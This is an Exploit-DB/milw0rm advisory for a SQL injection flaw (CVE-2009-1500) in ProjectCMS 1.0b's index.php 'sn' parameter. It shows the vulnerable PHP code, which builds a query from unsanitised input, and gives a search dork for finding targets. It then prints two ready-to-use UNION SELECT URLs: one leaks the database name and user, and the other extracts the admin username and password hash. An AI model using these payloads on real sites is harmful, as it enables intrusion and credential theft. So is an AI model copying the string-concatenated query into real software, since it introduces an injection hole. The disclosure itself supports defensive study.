ProjectCMS 1.0b index.php sn Remote SQL Injection Vulnerability

2009-04-29T00:00:00
ID EDB-ID:8565
Type exploitdb
Reporter YEnH4ckEr
Modified 2009-04-29T00:00:00

Description

ProjectCMS 1.0b (index.php sn) Remote SQL Injection Vulnerability. CVE-2009-1500. Webapps exploit for php platform

                                        
                                            ***********************************************************************************************
***********************************************************************************************
**	       										     **
**  											     **
**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
**     || || ||  []        [][]   []   []  []     []   []      [] []   []	 []    []    **
** [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]---\ 
**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    **
**							                                     **
**    											     **
**                          ¡VIVA SPAIN!...¡GANAREMOS EL MUNDIAL!...o.O                      **
**					¡PROUD TO BE SPANISH!				     **
**											     **
***********************************************************************************************
***********************************************************************************************

----------------------------------------------------------------------------------------------
|       	   	      SQL INJECTION (SQLi) VULNERABILITY	            	     |
|--------------------------------------------------------------------------------------------|
|                         	|  ProjectCMS v1.0 Beta Final  |		 	     |
|  CMS INFORMATION:		 ------------------------------			             |
|										             |
|-->WEB: http://projectcms.org/        				     			     |
|-->DOWNLOAD: http://projectcms.org/uploads/projectcms_1.0_BETA.zip          	             |
|-->DEMO: http://projectcms.org								     |
|-->CATEGORY: CMS / Portal								     |
|-->DESCRIPTION: ProjectCMS is an open source community project to create          	     |
|		a simple content management system with an easy to follow install...         |
|-->RELEASED: 2009-04-29								     |
|											     |
|  CMS VULNERABILITY:									     |
|											     |
|-->TESTED ON: firefox 3						                     |
|-->DORK: "Powered by ProjectCMS"							     |
|-->CATEGORY: SQL INJECTION VULNERABILITY					             |
|-->AFFECT VERSION: 1.0 Beta Final (maybe <= ?)				 		     |
|-->Discovered Bug date: 2009-04-29							     |
|-->Reported Bug date: 2009-04-29							     |
|-->Fixed bug date: N/A								             |
|-->Info patch:	N/A								             |
|-->Author: YEnH4ckEr									     |
|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
|-->WEB/BLOG: N/A									     |
|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.       |
|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)			     |
----------------------------------------------------------------------------------------------


#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>


-----------
VULN FILE:
-----------


	...

	$sn=$_GET["sn"];
			
	if ( $sn == "" ) {
	    	
		$sn = "1";
	}
				
	$sql="select sn,pagename,linktext,pagecontent,metakeywords,metadescription from $content where sn='$sn'";
			
	$result=mysql_query($sql,$connection) or die(mysql_error());

	...


------------------
PROOF OF CONCEPT:
------------------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,user(),5,6/*


Return --> user and database, this last in title ;)


----------
EXPLOIT:
----------


http://[HOST]/[HOME_PATH]/index.php?sn=1%27+AND+0+UNION+ALL+SELECT+1,database(),3,concat(username,0x3A3A3A,password),5,6+FROM+members+WHERE+memberid=1/*


Return --> username:::password (md5 hash) of admin and database (in title too).




<<<-----------------------------EOF---------------------------------->>>ENJOY IT!


#######################################################################
#######################################################################
##*******************************************************************##
## ESPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##        GREETZ TO: JosS and all SPANISH Hack3Rs community!         ##
##*******************************************************************##
#######################################################################
#######################################################################

# milw0rm.com [2009-04-29]